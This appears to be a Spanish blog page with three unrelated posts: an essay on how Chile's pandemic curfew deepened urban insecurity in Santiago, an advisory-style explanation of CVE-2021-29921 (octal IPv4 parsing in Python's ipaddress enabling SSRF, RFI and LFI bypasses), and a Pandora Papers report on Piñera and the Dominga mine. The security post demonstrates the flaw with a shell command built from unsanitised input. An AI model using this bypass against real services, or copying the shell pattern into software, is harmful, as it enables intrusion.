Desde el inicio de la crisis sanitaria generada por el COVID-19, en Chile se impuso deliberadamente un estado de excepción con el fin de controlar el orden público. Éste ha posibilitado el cierre de fronteras y más de quinientos días de sostenido toque de queda. Se ha buscado limitar la propagación del virus asegurando el confinamiento, evitando las reuniones sociales y reduciendo la movilidad de personas, especialmente en la jornada nocturna.

Hoy, ad-portas del cese de esta medida, queremos visibilizar un aspecto crítico que ha estado relativamente ausente en el discurso público, pero que a la luz de los resultados preliminares de una investigación en curso e intervenciones de organizaciones de la sociedad civil aparece como algo tremendamente crucial. Esto es, cómo más de dos años de toque de queda han impactado las experiencias y percepciones de inseguridad urbana de hombres y mujeres, particularmente en el centro de la ciudad de Santiago. 

Si bien se percibe como improbable la extensión del toque de queda en el contexto actual, creemos vital sumar voces para respaldar la necesidad de finalmente terminar con esta medida —supuestamente «sanitaria»— y abordar sus diversos efectos. Habitar con temor nuestro entorno afecta la fibra más sensible de la vida cotidiana, así como también las rutinas y movilidades de las personas, y la convivencia en la ciudad. A días de terminar el toque de queda, es importante reflexionar sobre cómo la creciente «fatiga pandémica» no solo se traduce en problemas de salud mental, como estrés y depresión. También el distanciamiento físico se traduce en lejanía, separación y desconfianza hacia el entorno social y espacial.

El rol de la autoridad y los retrocesos de la seguridad urbana pandemia

En la base de las medidas restrictivas y punitivas impuestas durante la pandemia se encuentra el supuesto (a veces, explicitado por la autoridad) de que la población local —particularmente aquella pobre, y en ocasiones también migrante y racializada— no siempre podría o estaría dispuesta a cuidarse y cuidar a otros. Es cierto, por ejemplo, que aglomeraciones masivas no autorizadas y fiestas clandestinas han sido protagonizadas por diversos ciudadanos y ciudadanas durante la pandemia. De igual modo, y como distintas voces han notado, también es cierto que las medidas de cuarentena no han sido del todo efectivas, y que para muchas personas es imposible cumplir esta medida por la necesidad de salir a generar ingresos diariamente.

Distintas académicas, organizaciones y activistas feministas han notado también cómo persistentes medidas de control social en el espacio público y el confinamiento han afectado particularmente a mujeres y niñas. Por ejemplo, la Red Chilena Contra la Violencia Hacia las Mujeres ha visibilizado cómo ellas suelen asumir las dificultades de trasladar diversas actividades cotidianas al espacio doméstico. De manera crítica se suma a esto el aumento desproporcionado de distintas formas de violencia física, psicológica y sexual en su contra. Aún más, el toque de queda ha dejado sin herramientas a aquellas mujeres que han necesitado pedir ayuda ocupando el espacio público en ese bloque horario. Tal fue el caso de quienes fueron aprendidas por acudir a carabineros en horario nocturno rompiendo el toque de queda.

Adicionalmente, como elaboramos aquí, un sentido de desprotección y una creciente sensación de amenaza y miedo de ser víctima de delitos y agresiones de diverso carácter en el espacio público son percepciones comunes, y que también afectan especialmente a las mujeres. Mujeres diversas —migrantes y chilenas, de distintas edades, nuevas habitantes y otras de larga data— enfatizan el temor constante a ser atacadas, asaltadas al transitar o trabajar en sus entornos residenciales.

Estas situaciones ponen en tensión los retrocesos y soluciones que han generado las medidas de confinamiento en pandemia. Este cuestionamiento no implica desconocer la importancia de respetar medidas sanitarias, en tanto sea el (auto)cuidado de la población, y no meramente el control social, lo que las inste.

La percepción de inseguridad en el centro de la ciudad

La percepción de inseguridad aparece como un problema nacional. Ya a principios de 2020 la Comisión de Seguridad Ciudadana de la Asociación Chilena de Municipalidades señalaba que en el contexto de pandemia un 85 por ciento de los municipios percibía un aumento en los delitos. Si bien este es un problema generalizado, impacta de manera diferente a distintos territorios.

Como es evidente, el toque de queda en distinta medida ha generado un abandono y alejamiento relativo de lugares como veredas, callejones y plazas; distanciamientos que han conllevado una sensación de inseguridad y falta de control territorial. Desde la opinión pública, quienes han dado cuenta de las emergentes dinámicas de violencia e inseguridad en el espacio urbano durante la pandemia se han enfocado en denunciar conductas delictivas como los robos y el microtráfico, especialmente en zona segregadas. La autoridad ha abordado el problema fundamentalmente a través de medidas punitivas (la celebre «mano dura»), dejando menos espacio para la discusión de medidas de protección y prevención que podrían ser implementadas por parte de la autoridad.

Aquí queremos girar la atención al centro de la ciudad. A partir de entrevistas a vecinos y vecinas, y de observaciones de campo realizadas por casi dos años en la Comuna de Santiago —particularmente en el sector de los barrios Santa Isabel y San Isidro, y en el Gran Yungay— hemos observado cómo, desde inicios de la pandemia, por sobre el miedo al contagio por coronavirus prevalece la inseguridad urbana como una de las principales problemáticas que las personas articulan.

«Mientras más nos separamos de nuestro entorno, más dependemos de la vigilancia del mismo», señala el sociólogo y filósofo polaco Zygmunt Bauman. No obstante, en las zonas bajo estudio dicha vigilancia se ve limitada. Por ejemplo, en el Gran Yungay se manifiesta un importante declive en el uso colectivo de los espacios públicos, especialmente por las tardes. Inmediatamente antes de la pandemia, durante el estallido social, las plazas, veredas y calles se caracterizaron por un uso intensivo —y en ocasiones, orquestado— por parte de una diversidad de habitantes y organizaciones vecinales. En pandemia, por el contrario, las plazas pasaron a ser lugares concebidos como espacios «tomados». Esta idea alude, sobre todo, al visible consumo y microtráfico de sustancias, y a las nuevas personas en situación de calle que habitan el sector, todas situaciones entendidas transversalmente como problemáticas en aumento.

En el sector de San Isidro y Santa Isabel, por otra parte, la seguridad vecinal se ve también afectada. Como han notado otros investigadores e investigadoras,

aquí prima una forma de desarrollo urbano que, favoreciendo la construcción de edificios en altura, cuenta con escasos lugares que promuevan el encuentro e intercambio vecinal. Los espacios de encuentro se reducen a mini plazoletas provistas de una infraestructura básica, pisos de tierra con zonas de juegos y espacios para mascotas. La expansión inmobiliaria en el sector, junto con transformar el paisaje promueve una alta movilidad y recambio vecinal, condiciones que inhiben dinámicas cotidianas de sociabilidad, encuentro y familiaridad con el entorno social. A esto se suman los vestigios y marcas concretas del estallido social; memorias de incendios, saqueos y represión observadas en el sector (cercano a Plaza de la Dignidad o Baquedano), muchas veces conllevan una sensación de extrañamiento y un mayor distanciamiento del contexto local.

Estas situaciones no sólo afectan la pertenencia social de las y los habitantes en relación con sus lugares de residencia y tránsito cotidiano, sino también el sentido de seguridad y las formas de habitar la ciudad.

Sensación de abandono y desconfianza hacia la autoridad

En ambas zonas urbanas bajo estudio las personas entrevistadas dan cuenta de un creciente temor a salir de sus hogares. Especialmente las mujeres dan cuenta de un alejamiento que es social, espacial y temporal, evitando salir a la calle al final de la tarde y también el contacto con otros. Las experiencias y percepciones de inseguridad no sólo se relacionan con la figura del «mal vecino», tan promovida en los medios, sino que también responden a una creciente desconfianza hacia la autoridad.

Durante estos dos años de trabajo de campo, hemos escuchado y observado, especialmente en el Gran Yungay, como la presencia policial se ha desplegado a través de formas de intimidación, fiscalización y control, siendo escasa la identificación de prácticas de protección y baja la respuesta a los llamados de ayuda que hace la población. Así, el temor no se funda solo en ser víctimas de ataques y actos delictivos, sino en no saber en quién confiar ni a quién recurrir en instancias que generan inseguridad y temor. Este aparente descuido y falta de atención a la seguridad en tiempos de pandemia explica entre otros factores por qué el toque de queda es crecientemente percibido como una mera medida de control que atenta contra las voluntades individuales, perdiendo así legitimidad como medida sanitaria y de protección a la sociedad.

Si bien la preocupación por la inseguridad no es nueva y trasciende el contexto de la pandemia, resulta fundamental establecer un punto de partida, considerando las situaciones emergentes y crecientemente complejas vividas en distintos territorios como efecto de las persistentes medidas de confinamiento. Se requieren soluciones consistentes con el escenario actual que contribuyan al bienestar de la ciudadanía, a una mejor convivencia y relación con el contexto local. Es importante y legítimo preguntarse por los efectos ambivalentes de las medidas tomadas por la autoridad. El camino a seguir claramente no pasa por la renovación del estado de excepción ni por el desarrollo de nuevas medidas punitivas o de control social. El desafío más importante hoy es generar medidas de reparación, cuidado y protección del tejido social y la convivencia urbana, en miras a mitigar la inseguridad en diversos territorios de la ciudad.

3 comentarios

Validación incorrecta de direcciones IP en formato octal en Python 3.8-3.10 permite ataques SSRF, RFI y LFI

Publicada el 06/10/2021 por Anonymous Chile

Una dirección IPv4 se puede expresar de varias formas, en decimal, entero, octal y hexadecimal, aunque el decimal es lo más común. Por ejemplo: 8.8.8.8 en octal es 0010.0010.0010.0010.

Algo que sorprenderá a muchos… si ponemos en el navegador https://0127.0.0.1 realmente nos redireccionará a https://87.0.0.1/. Eso es porque las secciones de una dirección IPv4 se pueden interpretar como octal si tienen el prefijo «0», de acuerdo con la especificación original de IETF para direcciones IP ambiguas.

Pero, ¿qué pasa en las versiones de Python de la 3.8.0 a a la 3.10? Pues que la librería ipaddress elimina o descarta los ceros a la izquierda. De esta manera 010.8.8.8 acaba siendo 10.8.8.8:

$ python3.8
Python 3.8.0 (default, Feb 25 2021, 22:10:10)
[GCC 8.4.0] on linux
Type «help», «copyright», «credits» or «license» for more information.
>>> import subprocess
>>> import ipaddress
>>>
>>> SUSPECT = ‘010.8.8.8’
>>>
>>> print(ipaddress.ip_network(SUSPECT, strict=True))
10.8.8.8/32
>>>
>>> BAD_IP = ipaddress.ip_address(SUSPECT)
>>>
>>> print(‘http://’+str(BAD_IP))
http://10.8.8.8
>>>
>>> print(str(subprocess.check_output(«ping -W3 -v -c1 «+str(SUSPECT), shell=True, universal_newlines=True).strip()))
ping: socket: Permission denied, attempting raw socket…
ping: socket: Permission denied, attempting raw socket…
PING 010.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_seq=1 ttl=118 time=5.13 ms

— 010.8.8.8 ping statistics —
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 5.137/5.137/5.137/0.000 ms
>>>
>>> print(str(subprocess.check_output(«ping -W3 -v -c1 «+str(BAD_IP), shell=True, universal_newlines=True).strip()))
ping: socket: Permission denied, attempting raw socket…
ping: socket: Permission denied, attempting raw socket…
Traceback (most recent call last):
File «», line 1, in
File «/usr/lib/python3.8/subprocess.py», line 411, in check_output
return run(*popenargs, stdout=PIPE, timeout=timeout, check=True,
File «/usr/lib/python3.8/subprocess.py», line 512, in run
raise CalledProcessError(retcode, process.args,
subprocess.CalledProcessError: Command ‘ping -W3 -v -c1 10.8.8.8’ returned non-zero exit status 1.

Esta vulnerabilidad añadida en este commit, bautizada como CVE-2021-29921 y similar a la de netmask de Node.js de principios de año, apunta a grandes «daños colaterales»:

«La validación inadecuada de la entrada de cadenas en formato octal en ipaddress permitiría a atacantes remotos no autentificados realizar ataques Server-Side Request Forgery (SSRF), Remote File Inclusion (RFI) y Local File Inclusion (LFI) en múltiples programas que dependen de la stdlib ipaddress de Python».

En efecto, podemos concluír que la validación inadecuada de las cadenas octales en Python 3.8.0 hasta la v3.10 en las librerías stdlib e ipaddress permite a los atacantes remotos no autentificados realizar ataques indeterminados SSRF, RFI y LFI en muchos programas que dependen de las mencionadas librerías involucradas y afectadas por el susodicho incidente de seguridad. Los octectos de direcciones IP se dejan despojados en lugar de evaluarse como direcciones IP válidas. Por ejemplo, un atacante que envía una dirección IP a una aplicación web que depende de las librerías stdlib e ipaddress, podría causar SSRF a través de la entrada de datos octales. De esta manera, un atacante puede enviar direcciones IP explotables si el octeto es de 3 dígitos, con el octecto mínimo explotable siendo 08 (Denegación de Servicio) y el octeto máximo explotable es 099. Por ejemplo, un atacante puede enviar 010.8.8.8, que es 8.8.8.8, pero la función ipaddress de Python lo evaluará como 10.8.8.8.

Pandora Papers: Filtración expone un obscuro, corrupto y fraudulento sistema financiero en Chile y el mundo

Publicada el 06/10/2021 - 06/10/2021 por Anonymous Chile

Paraísos fiscales, la riqueza oculta de líderes mundiales y billonarios quedan al descubierto en una filtración sin precedentes

Millones de documentos filtrados, que dieron pie a la mayor colaboración periodística en la historia, revelan los secretos financieros de 35 jefes y exjefes de Estado, unos 330 funcionarios de más de 91 países y territorios, y un amplio grupo de millonarios. Todos en busca de mantener en reserva sus inversiones o beneficiarse de una baja tributación. Motivados por esas mismas razones, en la nómina también figuran fugitivos y estafadores que pretenden lavar sus ganancias ilegales.

Estos papeles secretos exhiben los negocios offshore del Rey de Jordania, de los presidentes de Ucrania, Kenia y Ecuador, del primer ministro de República Checa, y del exprimer ministro británico Tony Blair. Los archivos también detallan las actividades financieras de quien funge como ministro no oficial de propaganda del presidente ruso Vladimir Putin, y de más de 130 multimillonarios de Rusia, Estados Unidos, Turquía y otras naciones.

Los documentos filtrados revelan que muchos de los actores que podrían acabar con el sistema offshore son en realidad beneficiarios de sus servicios, escondiendo bienes en sociedades de papel y trusts –o fideicomisos– mientras sus gobiernos hacen poco para frenar el flujo global de dinero ilícito.

Entre los tesoros escondidos que revelan los documentos, destacan:

  • Un castillo de 22 millones de dólares en la Rivera Francesa, con cine y dos piscinas, comprado a través de sociedades offshore por el Primer Ministro populista de República Checa, un multimillonario que ha hecho campaña contra la corrupción de las élites económicas y políticas.
  • Más de 13 millones de dólares escondidos en un opaco trust en las Grandes Llanuras de Estados Unidos por el vástago de una de las familias más poderosas de Guatemala; una dinastía que controla empresas de fabricación de jabón y labiales, y que ha sido acusada de provocar daños a sus trabajadores y al medio ambiente.
  • Tres mansiones en la costa de Malibú que el Rey de Jordania compró por 68 millones de dólares a través de tres sociedades offshore años después de la Primavera Árabe, en la cual los jordanos salieron a las calles para protestar contra el desempleo y la corrupción.

Estos documentos secretos son conocidos como los Pandora Papers o Papeles de Pandora.

El Consorcio Internacional de Periodistas de Investigación (ICIJ) obtuvo más de 11,9 millones de documentos confidenciales y encabezó un equipo de más de 600 periodistas de 150 medios, quienes dedicaron dos años a examinarlos meticulosamente, a rastrear las fuentes y a excavar en los archivos judiciales y otros registros públicos de decenas de países.

Los documentos filtrados provienen de 14 firmas proveedoras de servicios offshore instaladas en varios países. Estas firmas incorporan sociedades de papel y otros escondites offshore para sus clientes, quienes generalmente buscan mantener sus operaciones financieras en las sombras. La información incluida en los archivos supera en cerca de tres veces el número de operaciones offshore de jefes de Estado reveladas en las anteriores filtraciones de documentos sobre paraísos fiscales, y más de dos veces el número de transacciones de funcionarios públicos.

Los documentos filtrados revelan que muchos de los actores que podrían acabar con el sistema offshore son en realidad beneficiarios de sus servicios, escondiendo bienes en sociedades de papel y trusts –o fideicomisos– mientras sus gobiernos hacen poco para frenar el flujo global de dinero ilícito que enriquece a delincuentes y empobrece a las naciones.

En una era de expansión del autoritarismo y de la desigualdad, la investigación de los Pandora Papers ofrece una perspectiva inédita sobre la manera en que el dinero y el poder operan en el siglo XXI, y sobre cómo el secreto financiero impulsado por Estados Unidos y otras naciones torcieron y quebraron el imperio de la ley alrededor del mundo.

Los hallazgos del ICIJ y de sus medios aliados exhiben cómo la finanza ultrasecreta ha infiltrado la política internacional y muestra por qué los gobiernos y las organizaciones globales han hecho tan poco para acabar con los abusos financieros en jurisdicciones extraterritoriales.

Un análisis realizado por ICIJ a los documentos secretos identificó 956 sociedades en paraísos fiscales vinculados con 336 políticos y funcionarios de alto nivel, incluyendo jefes de Estado, ministros, embajadores y otros. Más de dos tercios de estas sociedades fueron incorporadas en las Islas Vírgenes Británicas, una jurisdicción que durante mucho tiempo fue considerada como una pieza clave en el sistema offshore.

Por lo menos 11,3 billones de dólares están guardados offshore, según un estudio publicado en 2020 por la Organización para la Cooperación y el Desarrollo Económicos (OCDE). Debido a la complejidad y el secretismo de este sistema, resulta imposible distinguir cuántos de estos recursos están ahí por evasión de impuestos u otros delitos, y cuántos vienen de fuentes legítimas y han sido reportados ante las autoridades tributarias.

La investigación Pandora Papers devela los dueños secretos de sociedades offshore, cuentas bancarias anónimas, jets privados, yates, mansiones y obras de arte de Picasso, Banksy y otros artistas. La información que ofrece es más detallada que la que suelen obtener las agencias fiscalizadoras y gobiernos con problemas de liquidez.

Entre los personajes que los documentos vinculan con bienes offshore resaltan la superestrella de cricket de la India, Sachin Tendulkar, la diva de la música pop Shakira, la supermodelo Claudia Schiffer y un mafioso italiano conocido como “Lell El Gordo”.

Este mafioso, Raffaele Amato, ha sido vinculado con al menos una docena de asesinatos. Los documentos filtrados ofrecen detalles sobre una sociedad de papel registrada en Reino Unido, que Amato utilizó para comprar terrenos en España poco antes de huir de Italia, para instalar en la península ibérica su propio grupo criminal. Amato, cuya historia inspiró la multipremiada película “Gomorra”, está cumpliendo una pena de cárcel de 20 años.

El abogado de Tendulkar dijo que las inversiones del jugador de cricket son legítimas y han sido declaradas ante las autoridades tributarias. Un abogado de Shakira dijo que la cantante declaró sus sociedades offshorey que éstas no otorgaban ventajas fiscales. Representantes de Schiffer dijeron que la top model pagó sus impuestos en Reino Unido, donde reside.

En la mayoría de los países, controlar activos offshore o usar sociedades de papel para hacer negocios transfronterizos no es ilegal. Las personas que hacen negocios internacionales afirman que necesitan estas sociedades para llevar a cabo sus asuntos financieros.

Sin embargo, estos asuntos suelen resumirse en canalizar las ganancias de los países con impuestos elevados –donde se generan estas ganancias– hasta sociedades que solo existen en papel en jurisdicciones de baja recaudación fiscal. El uso de estas guaridas offshore es particularmente controversial para figuras políticas, porque consiste a menudo en estrategias para alejar sus actividades impopulares –o incluso de corrupción– del escrutinio público.

El imaginario popular suele reducir el sistema offshore a un grupo de islas lejanas y dispersas, cubiertas de palmeras. Los Pandora Papers muestran que la maquinaria del dinero offshore opera en todos los rincones del mundo, incluyendo a las democracias más sólidas. Entre los jugadores clave de este sistema están las instituciones de las élites –como bancos multinacionales, despachos de abogados y firmas de contabilidad– con sede en Estados Unidos y Europa.

El sistema offshore nunca ha dejado de adaptarse, y la delincuencia transfronteriza, la evasión de impuestos y la desigualdad siguen prosperando. Cuando un proveedor de servicios offshores es expuesto o sufre presiones de las autoridades, otros aprovechan su mala suerte y la convierten en un argumento de mercadotecnia para atraer hacia ellos a sus clientes que huyen hacia refugios más seguros.

De esta manera, encontramos el caso del actual presidente de la República de Chile, Sebastián Piñera Echeñique, implicado en la que podría ser una de las mayores filtraciones de datos bancarios que se ha visto o conocido en el último tiempo, gracias a la cual hemos podido observar que la familia Piñera Morel fue la mayor accionista del proyecto Dominga. Junto a Carlos Alberto Délano sumaban más del 56% de la propiedad, hasta que en diciembre de 2010 este último compró la participación de todos los otros socios en US $152 millones. Parte de la operación se llevó a cabo en las Islas Vírgenes Británicas, donde se firmó un contrato que establecía un pago en tres cuotas. La última dependía de que no hubiera cambios regulatorios que obstaculizaran la instalación de la mina y su puerto. El detalle es que dichos cambios dependían de decisiones del gobierno de Sebastián Piñera. Los inversionistas, incluyendo la familia presidencial, habrían obtenido una ganancia de 1000% en 18 meses.

La venta se selló con dos actas: una firmada en Chile por 14 millones de dólares y la otra en dicho paraíso fiscal por 138 millones de dólares. El pago debía realizarse en tres tramos, pero con una contingencia: el último pago solo se efectuaría si el Gobierno de Chile no declaraba la zona de operaciones del proyecto Dominga como santuario natural. El Ejecutivo de Piñera decidió no promover la iniciativa medioambiental y, de esta forma, el tercer tramo fue desembolsado.

A esta decisión del Gobierno de Piñera le precedió otra: en marzo de 2010 el mandatario anunció la cancelación de la construcción de la central termoeléctrica Barrancones tras una ola de protestas por parte de los medioambientalistas. El proyecto se rescindió pese a que contaba con los permisos para operar. En aquel entonces, no se sabía que Piñera estaba involucrado en el proyecto Dominga.

Además, los papeles publicados revelan que pocos días antes de que Piñera asumiera la presidencia en 2018, la compañía Parque Chiloé Overseas Inc. (registrada en las BVI y vinculada a él) se fusionó con la chilena Parque Chiloé SA. Esta luego fue absorbida por otra entidad chilena, Inversiones Odisea, donde cuatro hijos del mandatario poseen acciones.

Mientras, el gerente de las empresas de la familia de Piñera, recalcó a los investigadores que el inquilino de La Moneda no participó, ni estaba al tanto sobre los pormenores de la compraventa del proyecto Dominga. En paralelo, precisó que ni Piñera, ni cualquiera de sus familiares directos tiene control sobre empresas con registro en las BVI.

Ahora bien, recapitulando la conexión del actual mandatario con el mencionado proyecto minero, Sebastián Piñera y el empresario Carlos Alberto Délano se conocen desde niños. Se juntaban en sus veraneos en La Serena, unos 60 kilómetros al sur de uno de los negocios en el que, años más tarde, sus familias invirtieron juntas: Minera Dominga. En diciembre de 2010 separaron aguas en una operación que dejó el negocio en manos de Délano y que se selló en dos fases: un acto notarial en Santiago y otro en el paraíso fiscal de las Islas Vírgenes Británicas (BVI, por su sigla en inglés).

Para entonces Piñera ya era Presidente y fue Nicolás Noguera, el gerente general de su family office, Bancard, quien puso la firma en un contrato que fijó tres millonarios pagos, el último de los cuales dependía de decisiones administrativas de su propio gobierno: esa cuota sólo se pagaría si es que no se establecía un área de protección ambiental sobre la zona en que se explotaría Dominga o se construiría su puerto. Hasta hoy ese proyecto minero es criticado por el impacto ambiental que podría provocar en la cercana Reserva Nacional Pingüino de Humboldt, donde habitan especies protegidas.

Las huellas de la operación que involucran los negocios de la familia del Presidente de la República y del empresario condenado por evasión fiscal y cuestionado por el financiamiento ilegal de la política en el Caso Penta, Délano Méndez, junto con las familias Morel, Luksic, Cortés Solari y Cueto Plaza, además de algunas celebridades y personalidades como Leonardo Farkas, Holger Paulmann, Óscar Aitken (albacea de Augusto Pinochet) y los accionistas de la AFP PlanVital, se encuentran entre los más de 11,9 millones de documentos, en los que colaboraron más de 600 investigadorxs, reporterxs, periodistas y especialistas provenientes de todo el mundo.

La primera noticia sobre la relación de Piñera con Dominga la dio hace cuatro años Radio Bío Bío, cuando reveló que en 2009 el entonces empresario invirtió en el proyecto a través Mediterráneo Fondo de Inversión (FIP), gestionado por Administradora Bancorp, donde él y su familia participaban a través de una cascada de sociedades, según su propia declaración de patrimonio de 2010 (ver página 12 de esa declaración). Mediterráneo tenía un tercio de la propiedad de Minería Activa Uno Spa, que a su vez era la dueña de Minera Andes Iron, la empresa que busca construir Dominga.

Minería Activa Uno Spa fue creada en 2008 por la corredora de bolsa Larraín Vial para invertir en proyectos mineros desde la etapa de prospección. El fondo de inversión manejaba, a través de Minería Activa, la gestión de la empresa, mientras que una serie de inversionistas —el mayor era FIP Mediterráneo— ponían parte del capital. Buscando nuevos negocios llegaron a Santa Dominga Norte y Sur, en la comuna de La Higuera, en cuyas pertenencias mineras se hallaron reservas relevantes de hierro. Además de la familia Piñera Morel, en Minería Activa Uno Spa hay inversiones menores de otros de sus cercanos, como el gerente general de Bancard, Nicolás Noguera (Asesorías e Inversiones Larraín y Noguera), y el ex gerente de administración de la misma empresa, Santiago Valdés (Asesorías e Inversiones Calatrava). El segundo mayor inversionista es Inmobiliaria Duero, uno de los vehículos de inversión de Carlos Alberto Délano. Juntas, las familias Piñera Morel (33,33%) y Délano Méndez (22,73%) sumaban más del 56% de la propiedad de Minería Activa Uno Spa.

Según alguien que conoció el funcionamiento de Minera Activa Uno Spa, tras la elección presidencial en que ganó Sebastián Piñera hubo socios que estimaron que era poco apropiado que su familia siguiera siendo accionista. Se lo habrían hecho saber varias veces a Noguera, quien insistía en que Mediterráneo estaba fuera del fideicomiso ciego voluntario constituido por Piñera en abril de 2009 y que en ese fondo sólo participaban sus hijos, por lo tanto, no habría ninguna complicación. Eran tiempos en que Piñera era públicamente cuestionado por no deshacerse a tiempo de negocios que generarían conflictos de interés, como Lan Airlines o Chilevisión.

En marzo de 2010 Piñera asumió como Presidente de la República en su primer mandato y pocos meses después, en agosto, dio un golpe inesperado: tras una ola de protestas de ambientalistas, anunció la cancelación de la construcción de la termoeléctrica Barrancones, de la franco-belga Suez, pese a que contaba con los permisos para operar. “He acordado con Suez cambiar la ubicación de la central termoeléctrica Barrancones, de forma tal de alejarla del sector de Punta Choros, Isla Damas e Isla Gaviota y proteger ese santuario de la naturaleza”, dijo entonces Piñera.

Barrancones buscaba emplazarse en la comuna de La Higuera, al igual que Dominga, pero en ese momento nadie sabía que Piñera tenía intereses económicos en la zona. Cuando se supo, se abrió una comisión investigadora en la Cámara de Diputados que entre otras cosas concluyó que la información recabada, en particular desde el Servicio de Impuestos Internos, “permite, a lo menos, presumir que el ex Presidente buscó beneficiar a minera Dominga en agosto de 2010, cuando de manera arbitraria y saltándose la institucionalidad ambiental canceló la construcción de la central termoeléctrica Barrancones en la comuna de La Higuera”. El asunto también fue objeto de una querella del ex diputado Hugo Gutiérrez, proceso donde Piñera fue sobreseído.

La estructura offshore

Entre los datos que logró reunir la comisión investigadora no hay nada concluyente respecto a intenciones, pero lo que sí es claro a partir de los nuevos antecedentes contenidos en Pandora Papers es que en el momento en que Piñera bajó Barrancones, los inversionistas de Minería Activa Uno Spa ya habían empezado a armar el esquema que les permitiría cobrar caro por su salida de Dominga.

El encargado de hacer las gestiones para armar la estructura societaria en las Islas Vírgenes Británicas fue el abogado Juan Paulo Bambach, uno de los socios del geólogo Iván Garrido, quien hasta fines de 2019 fue el presidente ejecutivo de Andes Iron, la empresa que maneja Dominga. A Garrido se le conoce como el “padre” de Dominga, pues antes trabajaba en otra minera, donde descubrió originalmente la veta. Garrido y Bambach fueron los primeros en asociarse con Larraín Vial y formar la sociedad Minería Activa. Larraín Vial se encargó de buscar inversionistas —entre ellos los Piñera y los Délano— que se asociarían al alero de Minería Activa Uno Spa. Luego, Minería Activa Uno Spa y Minería Activa, crearían Administradora Minera Global, a cargo de gestionar el Fondo de Inversión Privado Latin Minerals.

Minería Activa encargó una estructura similar a la chilena pero en BVI a Trident Trust, firma internacional especializada en crear y gestionar sociedades en jurisdicciones de baja o nula tributación. El 2 de junio de 2010, Iván Garrido llenó un formulario caratulado como “confidencial”, donde debían informar quién era el beneficial owner o beneficiario final de las sociedades creadas, pese a que sus nombres nunca aparecerían en documentos públicos. En este caso, el casillero de beneficial owner lo ocupó Minería Activa Uno Spa.


El delfín nariz de botella es una de las especies que habita en la costa de la zona donde Dominga planea operar.

A continuación, debían marcar si el beneficial owner o su familia eran personas políticamente expuestas (PEP), pero el espacio quedó en blanco, pese que la principal accionista de Minería Activa Uno Spa era un fondo de la familia del Presidente chileno. Consultado por esta inconsistencia, Iván Garrido dice que en ese momento le pareció correcto, pero que ahora no lo haría: “Yo adscribí a la idea de que no había ningún conflicto de interés porque el dato duro era que Piñera no estaba y era un negocio de los hijos. En ese momento se veía de esa forma. Si me preguntan ahora, hoy no lo habría firmado así”.

Se pidió que el nombre de la nueva sociedad fuese Andes Iron Limited, que debía emitir 50 mil acciones que quedarían en manos de Latin Mineral Limited (una sociedad que debía ser creada para tal efecto, según se señala en un correo electrónico de Trident). El primer director de Andes Iron Limited sería Juan Paulo Bambach, todo esto según se detalla en el documento «Incorporación Andres Iron«.

En cuanto al origen de los fondos de Andes Iron Limited, en el formulario enviado a Trident se explicaba que correspondían a un aumento de capital del beneficial owner, es decir Minería Activa Uno Spa, para cuyo detalle se hacía referencia a un anexo. Ese documento comenzaba con una carta de Juan Paulo Bambach con membrete del estudio Philippi, donde el abogado es socio. En la misiva se explicaba que el Fondo de Inversión Privado Latin Minerals era propiedad en un 100% de Minería Activa Uno Spa, una empresa que desarrollaba proyectos mineros en su etapa temprana para luego venderlos a operadores mineros. Se relataba que Minería Activa Uno Spa había sido creada por expertos del rubro y Larraín Vial Corredores de Bolsa a través de la sociedad Minería Activa S.A. Esta última, señalaba el documento, era dueña de la serie B de acciones de Minería Activa Uno Spa y estaba a cargo de la gestión de la empresa. La serie A estaba en manos de los inversionistas, que incluían “algunos de los grupos económicos más grandes del mercado”.

A continuación, una tabla detallaba las sociedades dueñas de la serie A: el mayor accionista, con un 33,33%, era FIP Mediterráneo (familia Piñera-Morel), seguido por Inmobiliaria Duero Ltda. (familia Délano), con un 22,73%. Entre ambos sumaban el 56,06% de las acciones de Minería Activa Uno Spa, según afirma el documento «Socios de Minería Activa Uno Spa«.


Ambientalistas afirman que la Reserva Nacional Pingüino Humboldt se verá amenazada por el funcionamiento de la minera.

La estructura societaria montada en Islas Vírgenes Británicas con Latin Minerals Ltd. como único accionista de Andes Iron Limited, duró sólo unos meses. El primer paso de esta última fue invertir en Chile $5.500 millones (unos US $10,8 millones de la época) en Andes Iron Limitada (la versión local de la sociedad de las Islas Vírgenes y dueña de Dominga), con lo cual el 12 de agosto de 2010 la participación de Minería Activa Uno Spa se diluyó hasta un 9,5%, mientras que la de Andes Iron Limited (también propiedad de Minería Activa Uno Spa, pero desde las Islas Vírgenes) se quedó con el 90,5%.

Los documentos revelados por Pandora Papers dan cuenta de que el 4 de octubre de 2010, Minería Activa Uno Spa, cuyo principal accionista era la familia Piñera-Morel, llegó a un acuerdo para vender la estructura societaria detrás de Minera Dominga a Inmobiliaria Duero (familia Délano) y firmó un contrato donde se establecieron las condiciones. La fecha de cierre del trato quedó fijada para el 10 de diciembre. Ese día en Santiago, Minería Activa Uno Spa formalizó la venta de su participación en Andes Iron Limitada al Fondo de Inversión Privada (FIP) Rucapangui, controlado por Carlos Alberto Délano y su familia. Según la escritura publicada en su momento por Bio Bío, pagaron $6.675 millones, unos US $14 millones.

Lo cierto es que la gran tajada de la operación no se llevó a cabo en Chile, sino en las Islas Vírgenes Británicas, desde donde Andes Iron Limited controlaba el 90,5% de Andes Iron Limitada (Dominga). Ahí el monto de la venta fue casi 10 veces superior: US $138 millones pagaderos en tres cuotas. Sumando la venta en Chile y la que tuvo lugar en BVI, los Délano pagaron US $152 millones por Dominga.

La estructura diseñada para la transacción en las Islas Vírgenes Británicas fue también más compleja que su versión chilena. Para ejecutar la compra offshore, Inmobiliaria Duero designó a Delcorp International Limited, propiedad de la chilena Inversiones Delmen Limitada. Las tres sociedades son vehículos de inversión de Carlos Alberto Délano y su familia.

En el contrato, Delcorp es identificada como la parte compradora, mientras que la vendedora es Latin Minerals, que en ese entonces era de Minería Activa Uno Spa y a su vez era dueña de Andes Iron Limited. En concreto, la operación consistía en que Delcorp le compraba a Latin Minerals el 100% de Andes Iron Limited.

